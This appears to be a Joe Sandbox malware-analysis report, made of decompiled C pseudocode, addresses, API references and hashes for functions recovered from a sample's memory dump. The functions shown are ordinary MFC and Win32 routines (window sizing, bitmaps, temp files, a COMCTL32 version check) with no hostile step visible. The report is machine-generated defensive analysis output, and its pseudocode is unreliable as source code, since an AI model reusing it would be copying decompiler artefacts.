0x0041cb17
0x0041cb1a
0x0041cb1c
0x0041cb1c
0x0041cb22
0x0041cb24
0x0041cb24
0x0041cb27
0x0041cb2d
0x0041cb32
0x0041cb36

APIs

SetRectEmpty.USER32(?), ref: 0041C8B7
GetWindowRect.USER32 ref: 0041CA5F
SetRectEmpty.USER32(?), ref: 0041CAD0

Strings

@, xrefs: 0041C924

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Empty$Window
String ID: @
API String ID: 444217639-2766056989
Opcode ID: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
Instruction ID: cf120915a9bc79257b06898680a609e4f39c2be92c1a3f6b3b2cd3709033a41d
Opcode Fuzzy Hash: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
Instruction Fuzzy Hash: 81C14771A40219AFCF15DFA8CC84AEEBBB5FF44354F04816AE815AB351D738AD81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418A76, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00418A76() {
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t64;
				intOrPtr* _t74;
				intOrPtr _t76;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t90;

				E00406520(E00429F80, _t78);
				_t35 =  *0x436980; // 0x436994
				_t55 =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t78 - 0x10)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t78 + 0x14)) = _t35;
				_t74 =  *((intOrPtr*)(_t78 + 0xc));
				 *(_t78 - 4) = 0;
				if(_t74 == 0) {
					L19:
					if( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x14)) - 8)) == 0) {
						_t90 =  *0x439c48; // 0x1
						_push(0x104);
						if(_t90 == 0) {
							lstrcpynA(_t78 - 0x114,  *(_t78 + 8), ??);
						} else {
							_push(_t78 - 0x114);
							_push( *(_t78 + 8));
							E00417CBF();
						}
						E0041E3FA(_t78 + 0x14, _t55, _t78 - 0x114);
					}
					E0041BB46( *((intOrPtr*)(_t78 + 0x14)), 0x30,  *((intOrPtr*)(_t78 - 0x10)));
					L25:
					 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
					_t38 = E00416AEC(_t78 + 0x14);
					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
					return _t38;
				}
				if(E00416753(_t74, 0x42d4d0) != 0) {
					goto L25;
				}
				if(E00416753(_t74, ?str?) == 0) {
					_t48 = E00416753(_t74, "H�B");
					__eflags = _t48;
					if(_t48 == 0) {
						goto L19;
					}
					_t49 =  *((intOrPtr*)(_t74 + 0x10));
					_t64 = _t74 + 0x10;
					__eflags =  *((intOrPtr*)(_t49 - 8));
					if( *((intOrPtr*)(_t49 - 8)) == 0) {
						E00416BE5(_t64,  *(_t78 + 8));
					}
					_t50 = E00416CC1(_t78 + 0x14, _t78, 0xff);
					__eflags =  *((intOrPtr*)( *_t74 + 0xc))(_t50, 0x100, _t78 - 0x10);
					if(__eflags == 0) {
						_t76 =  *((intOrPtr*)(_t74 + 8));
						__eflags = _t76 - 2;
						if(__eflags >= 0) {
							__eflags = _t76 - 3;
							if(__eflags <= 0) {
								_t55 = 0xf121;
							} else {
								__eflags = _t76 - 5;
								if(_t76 == 5) {
									__eflags =  *((intOrPtr*)(_t78 + 0x10));
									_t55 = (0 | __eflags != 0x00000000) + 0xf123;
								} else {
									__eflags = _t76 - 0xd;
									if(__eflags == 0) {
										_t55 = 0xf122;
									}
								}
							}
						}
					}
					E00416D10(_t78 + 0x14, __eflags, 0xffffffff);
				} else {
					_t77 =  *((intOrPtr*)(_t74 + 8));
					if(_t77 == 3 || _t77 > 4 && _t77 <= 7) {
						_t55 = 0xf120;
					}
				}
			}

0x00418a7b
0x00418a86
0x00418a8c
0x00418a91
0x00418a94
0x00418a97
0x00418a9e
0x00418aa1
0x00418b71
0x00418b77
0x00418b79
0x00418b7f
0x00418b84
0x00418ba1
0x00418b86
0x00418b8c
0x00418b8d
0x00418b90
0x00418b90
0x00418bb3
0x00418bb3
0x00418bc0
0x00418bc5
0x00418bc5
0x00418bcc
0x00418bd7
0x00418bdf
0x00418bdf
0x00418ab5
0x00000000
0x00000000
0x00418ac9
0x00418af6
0x00418afb
0x00418afd
0x00000000
0x00000000
0x00418aff
0x00418b02
0x00418b05
0x00418b08
0x00418b0d
0x00418b0d
0x00418b1a
0x00418b30
0x00418b32
0x00418b34
0x00418b37
0x00418b3a
0x00418b3c
0x00418b3f
0x00418b62
0x00418b41
0x00418b41
0x00418b44
0x00418b54
0x00418b5a
0x00418b46
0x00418b46
0x00418b49
0x00418b4b
0x00418b4b
0x00418b49
0x00418b44
0x00418b3f
0x00418b3a
0x00418b6c
0x00418acb
0x00418acb
0x00418ad1
0x00418ae5
0x00418ae5
0x00418ad1

APIs

__EH_prolog.LIBCMT ref: 00418A7B
lstrcpynA.KERNEL32(?,?,00000104), ref: 00418BA1

Strings

HB, xrefs: 00418AEF
pB, xrefs: 00418ABB

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologlstrcpyn
String ID: HB$pB
API String ID: 588646068-605489205
Opcode ID: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
Instruction ID: a9f5f5579fdfe236bfe92a05d823b87aef4f8825b77d1c3b985387d1bf5da384
Opcode Fuzzy Hash: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
Instruction Fuzzy Hash: EF419D71A0421A9BCF21EF55C8819EEB3A5EF04354F11412FF866A71E0EB38AD80CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00416FCD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00416FCD(void** __ecx, char* _a4, short _a8) {
				signed int _v8;
				void** _v12;
				signed int _v16;
				short* _v20;
				short _v84;
				signed int _t47;
				signed int _t48;
				void* _t61;
				signed int* _t67;
				void* _t75;
				signed int _t81;
				short* _t84;
				signed int _t86;
				signed int _t93;
				void** _t94;
				void* _t96;

				_v12 = __ecx;
				if(__ecx[1] != 0) {
					_t67 = GlobalLock( *__ecx);
					_t47 = _t67[0];
					_v8 = 0 | _t47 == 0x0000ffff;
					if(_t47 != 0xffff) {
						_t48 =  *_t67;
					} else {
						_t48 = _t67[3];
					}
					asm("sbb esi, esi");
					_v16 = _t48 & 0x00000040;
					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
					if(_v8 == 0) {
						 *_t67 =  *_t67 | 0x00000040;
					} else {
						_t67[3] = _t67[3] | 0x00000040;
					}
					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
					_t84 = E00416E50(_t67);
					_t75 = 0;
					_v20 = _t84;
					if(_v16 != 0) {
						_t22 = E00406A48(_t84 + _t93) * 2; // 0x3
						_t75 = _t93 + _t22 + 2;
					}
					_t26 = _t84 + 3; // 0x6
					_t55 = _t75 + _t26 & 0x000000fc;
					_v16 = _t75 + _t26 & 0x000000fc;
					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
					if(_v8 == 0) {
						_t81 = _t67[2];
					} else {
						_t81 = _t67[4];
					}
					if(_a4 != _t75 && _t81 > 0) {
						E00405EA0(_t86, _t55, _t67 - _t55 + _v12[1]);
						_t96 = _t96 + 0xc;
					}
					 *_v20 = _a8;
					E00405EA0(_v20 + _t93,  &_v84, _a4 - _t93);
					_t94 = _v12;
					_t94[1] = _t94[1] + _t86 - _v16;
					GlobalUnlock( *_t94);
					_t94[2] = _t94[2] & 0x00000000;
					_t61 = 1;
					return _t61;
				}
				return 0;
			}

0x00416fd9
0x00416fdc
0x00416fef
0x00416ff3
0x00417002
0x00417005
0x0041700c
0x00417007
0x00417007
0x00417007
0x00417016
0x00417018
0x0041701f
0x00417024
0x0041702c
0x00417026
0x00417026
0x00417026
0x00417046
0x0041704f
0x00417051
0x00417053
0x00417059
0x00417065
0x00417065
0x00417065
0x0041706c
0x00417070
0x00417076
0x00417079
0x00417080
0x00417088
0x00417082
0x00417082
0x00417082
0x0041708f
0x004170a1
0x004170a6
0x004170a6
0x004170b6
0x004170c0
0x004170c5
0x004170d0
0x004170d3
0x004170d9
0x004170df
0x00000000
0x004170e1
0x00000000

APIs

GlobalLock.KERNEL32 ref: 00416FE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0041703C
GlobalUnlock.KERNEL32(?), ref: 004170D3

Strings

System, xrefs: 00416FD3

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$ByteCharLockMultiUnlockWide
String ID: System
API String ID: 231414890-3470857405
Opcode ID: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
Instruction ID: c2f8acceaa533c94d1390ef28e6fe5bddd73ae44c4aad8fbd6ca481d2bb84418
Opcode Fuzzy Hash: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
Instruction Fuzzy Hash: 9741E872904305EFCB10DFA4C8859EF7BB5FF44354F50816AE815AB284D3399A86CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004227B5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004227B5(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x6c)) == 0) {
					L6:
					if(( *(_t71 + 0x64) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0x0000002f | 0x00000020;
						}
					}
					_t74 = E004225E5(_v8, _t77, _a16);
					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *((intOrPtr*)(_t74 + 0x20)) == 0) {
						_t29 = _t71 + 0x1c; // 0x9630a380
						 *((intOrPtr*)(_t74 + 0x20)) =  *_t29;
					}
					E0041D196(E0041649C(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					_t32 = _t71 + 0x1c; // 0x9630a380
					_t42 = GetWindowLongA( *_t32, 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E0041668C(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t4 = _t71 + 0x70; // 0xc8b8c35e
				_t76 =  *_t4;
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x78)) == 0 || E0041D12E(_t76) != 1 || ( *(_t76 + 0x64) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E00413740(_t77, GetParent( *(_t76 + 0x1c)));
					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					goto L13;
				}
			}

0x004227b5
0x004227b8
0x004227bc
0x004227c1
0x004227c7
0x00422820
0x00422824
0x00422826
0x0042282e
0x00422839
0x00422839
0x0042282e
0x0042284b
0x00422856
0x0042285e
0x00422860
0x00422863
0x00422863
0x00422876
0x00422881
0x00422889
0x0042288c
0x00422897
0x004228ab
0x004228af
0x00422899
0x0042289d
0x004228a2
0x004228a5
0x00000000
0x004228a5
0x00422897
0x004227c9
0x004227c9
0x004227ce
0x00000000
0x004227ec
0x004227ff
0x0042280a
0x00422815
0x00000000
0x00422815

APIs

GetParent.USER32(?), ref: 004227EF

Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664

GetWindowLongA.USER32 ref: 0042288C
UpdateWindow.USER32(?), ref: 004228A5

Strings

P, xrefs: 0042282A

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$LongParentUpdate
String ID: P
API String ID: 1906497633-3110715001
Opcode ID: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
Instruction ID: 4478c7b2db2806f657cab283070aca1dc542ec48e340ed71b02adf3b0aace616
Opcode Fuzzy Hash: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
Instruction Fuzzy Hash: C631F371700614BFDB21AF25DD48BAF7BA8FF04704F40062AF9015A2A1CB79EC51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004244A1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004244A1(void* __edx) {
				signed char* _v8;
				char _v12;
				int _v16;
				void _v148;
				unsigned int _t20;
				int _t26;
				signed int _t36;
				struct HINSTANCE__* _t38;
				struct HBITMAP__* _t39;
				int _t41;
				unsigned int _t43;
				void* _t47;
				signed int* _t48;
				signed int _t53;
				signed int _t57;
				void* _t58;
				void* _t60;

				_t47 = __edx;
				_t20 = GetMenuCheckMarkDimensions();
				_t41 = _t20;
				_t43 = _t20 >> 0x10;
				_v16 = _t43;
				if(_t41 > 0x20) {
					_t41 = 0x20;
				}
				asm("cdq");
				_t57 = _t41 + 0xf >> 4;
				_t53 = (_t41 - 4 - _t47 >> 1) + (_t57 << 4) - _t41;
				if(_t53 > 0xc) {
					_t53 = 0xc;
				}
				_t26 = 0x20;
				if(_t43 > _t26) {
					_v16 = _t26;
				}
				E00406330( &_v148, 0xff, 0x80);
				_v8 = 0x42c00c;
				_t58 = _t57 + _t57;
				_v12 = 5;
				_t48 = _t60 + (_v16 + 0xfffffffa >> 1) * _t57 * 2 - 0x90;
				do {
					_v8 =  &(_v8[1]);
					_t36 =  !(( *_v8 & 0x000000ff) << _t53);
					_t48[0] = _t36;
					 *_t48 = _t36;
					_t48 = _t48 + _t58;
					_t16 =  &_v12;
					 *_t16 = _v12 - 1;
				} while ( *_t16 != 0);
				_t38 = CreateBitmap(_t41, _v16, 1, 1,  &_v148);
				 *0x439c30 = _t38;
				if(_t38 == 0) {
					_t39 = LoadBitmapA(_t38, 0x7fe3);
					 *0x439c30 = _t39;
					return _t39;
				}
				return _t38;
			}

0x004244a1
0x004244ad
0x004244b3
0x004244b9
0x004244bf
0x004244c2
0x004244c6
0x004244c6
0x004244cd
0x004244d0
0x004244de
0x004244e3
0x004244e7
0x004244e7
0x004244ea
0x004244ed
0x004244ef
0x004244ef
0x00424503
0x00424511
0x0042451d
0x0042451f
0x00424526
0x0042452d
0x00424538
0x0042453d
0x00424541
0x00424544
0x00424546
0x00424548
0x00424548
0x00424548
0x0042455c
0x00424566
0x0042456c
0x00424574
0x0042457a
0x00000000
0x0042457a
0x00424580

APIs

GetMenuCheckMarkDimensions.USER32 ref: 004244AD
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042455C
LoadBitmapA.USER32 ref: 00424574

Strings

, xrefs: 004244BC

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
Instruction ID: 209a20424c1af6e272a19c9ebc2633acba681278a5e608b332d2eb8150819f76
Opcode Fuzzy Hash: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
Instruction Fuzzy Hash: 39213A72F00225AFDB20DB78DC85BAEBBB4EB80304F454167E945EB282D7749A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E47A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040E47A(void* __ecx) {
				signed int _t22;
				signed char _t36;
				char* _t43;
				void* _t45;

				E00406520(E0042AE14, _t45);
				_t22 =  *(_t45 + 8) & 0x00000007;
				 *(__ecx + 4) = _t22;
				_t36 =  *(__ecx + 8) & _t22;
				if(_t36 != 0) {
					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
						E004067EC(0, 0);
					}
					_t52 = _t36 & 0x00000004;
					if((_t36 & 0x00000004) == 0) {
						__eflags = _t36 & 0x00000002;
						_t43 = "ios::failbit set";
						if((_t36 & 0x00000002) == 0) {
							_t43 = "ios::eofbit set";
						}
					} else {
						_t43 = "ios::badbit set";
					}
					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
					E00401AE0(_t45 - 0x1c, 0);
					E00401B90(_t45 - 0x1c, _t43, E00405A40(_t43));
					_push(_t45 - 0x1c);
					 *((intOrPtr*)(_t45 - 4)) = 0;
					E0040E516(_t45 - 0x38, _t52);
					 *((intOrPtr*)(_t45 - 0x38)) = 0x42f8c4;
					_t22 = E004067EC(_t45 - 0x38, 0x433890);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t22;
			}

0x0040e47f
0x0040e48b
0x0040e48e
0x0040e494
0x0040e496
0x0040e49d
0x0040e4a1
0x0040e4a1
0x0040e4a6
0x0040e4aa
0x0040e4b3
0x0040e4b6
0x0040e4bb
0x0040e4bd
0x0040e4bd
0x0040e4ac
0x0040e4ac
0x0040e4ac
0x0040e4c9
0x0040e4cc
0x0040e4dd
0x0040e4e8
0x0040e4e9
0x0040e4ec
0x0040e4fa
0x0040e501
0x0040e506
0x0040e50b
0x0040e513

APIs

__EH_prolog.LIBCMT ref: 0040E47F

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

Strings

ios::eofbit set, xrefs: 0040E4BD, 0040E4D1, 0040E4D9
ios::badbit set, xrefs: 0040E4AC
ios::failbit set, xrefs: 0040E4B6

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
Instruction ID: 058c2687817cbb3025356127984514509d88e2cf1c36159cda0efedd272f4144
Opcode Fuzzy Hash: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
Instruction Fuzzy Hash: E41173B2D015196EC700EBA2D891AEEB778AF04358F44847BF41677282D77C5919CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00418BE2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418BE2(void* __eflags) {
				intOrPtr _t22;
				intOrPtr _t45;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				E00406520(E00429FAB, _t47);
				_t22 =  *0x436980; // 0x436994
				 *((intOrPtr*)(_t47 - 0x14)) = 0;
				 *((intOrPtr*)(_t47 - 0x10)) = _t22;
				_t45 = 1;
				 *((intOrPtr*)(_t47 - 4)) = _t45;
				GetFullPathNameA( *(_t47 + 0xc), 0x104, _t47 - 0x118, _t47 + 0xc);
				 *( *(_t47 + 0xc)) = 0;
				GetTempFileNameA(_t47 - 0x118, "MFC", 0, E00416CC1(_t47 - 0x10, _t47, 0x105));
				E00416D10(_t47 - 0x10, _t52, 0xffffffff);
				if( *((intOrPtr*)(_t47 + 0x10)) == 0) {
					E00417B0B( *((intOrPtr*)(_t47 - 0x10)));
				}
				E00416861( *((intOrPtr*)(_t47 + 8)), _t47 - 0x10);
				 *((intOrPtr*)(_t47 - 0x14)) = _t45;
				 *((char*)(_t47 - 4)) = 0;
				E00416AEC(_t47 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return  *((intOrPtr*)(_t47 + 8));
			}

0x00418be2
0x00418be7
0x00418bf2
0x00418bfb
0x00418bfe
0x00418c06
0x00418c17
0x00418c1a
0x00418c2b
0x00418c40
0x00418c4b
0x00418c53
0x00418c58
0x00418c58
0x00418c64
0x00418c69
0x00418c6f
0x00418c72
0x00418c7f
0x00418c87

APIs

__EH_prolog.LIBCMT ref: 00418BE7
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40

Part of subcall function 00416D10: lstrlenA.KERNEL32(00000000,?,00416FC8,000000FF,?,00411ED7,?,?,?,0003C000,00000010,00000000,?,?), ref: 00416D23

Part of subcall function 00417B0B: DeleteFileA.KERNEL32(?), ref: 00417B0F
Part of subcall function 00417B0B: GetLastError.KERNEL32(00000000), ref: 00417B1A

Strings

MFC, xrefs: 00418C3A

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileName$DeleteErrorFullH_prologLastPathTemplstrlen
String ID: MFC
API String ID: 501224598-3472178984
Opcode ID: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
Instruction ID: 106d24b416a7ad35a8895af97b87cb9fb89e8d85cfd421907a0314e2615bf241
Opcode Fuzzy Hash: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
Instruction Fuzzy Hash: 90114FB1A01219EFCF00EF94DC819EEB778FF04354F01456AF925A7290DB749A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042514B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0042514B() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x43687c; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E00406330( &_v24, 0, 0x14);
					_v24 = 0x14;
					_push( &_v24);
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x43687c = _t19;
				return _t19;
			}

0x00425151
0x00425159
0x004251b8
0x004251b8
0x00425174
0x00425176
0x0042517d
0x00425187
0x00425192
0x00425199
0x0042519e
0x004251ab
0x004251ab
0x0042519e
0x004251ad
0x00000000

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,004036DA,?,?,004036DA,?,00000800,50402834,?,?,0000E800,?), ref: 00425162
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0042516E

Strings

COMCTL32.DLL, xrefs: 0042515D
DllGetVersion, xrefs: 00425168

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: COMCTL32.DLL$DllGetVersion
API String ID: 1646373207-1518460440
Opcode ID: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
Instruction ID: 98511304bc6decc3b615f85e9ad6552c3d683fa4d8a624641396a172b3716892
Opcode Fuzzy Hash: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
Instruction Fuzzy Hash: 61F04FB1F013396BE71097E9AC45BAA77A89B08754F910532EA10F3290E6B4D90487F9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A759, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A759(struct HWND__* _a4, intOrPtr _a8) {
				char _v16;
				signed int _t13;

				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					return 0;
				} else {
					GetClassNameA(_a4,  &_v16, 0xa);
					_t13 = lstrcmpiA( &_v16, "combobox");
					asm("sbb eax, eax");
					return  ~_t13 + 1;
				}
			}

0x0041a763
0x00000000
0x0041a77c
0x0041a785
0x0041a794
0x0041a79c
0x00000000
0x0041a79e

APIs

GetWindowLongA.USER32 ref: 0041A76A
GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794

Strings

combobox, xrefs: 0041A78E

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
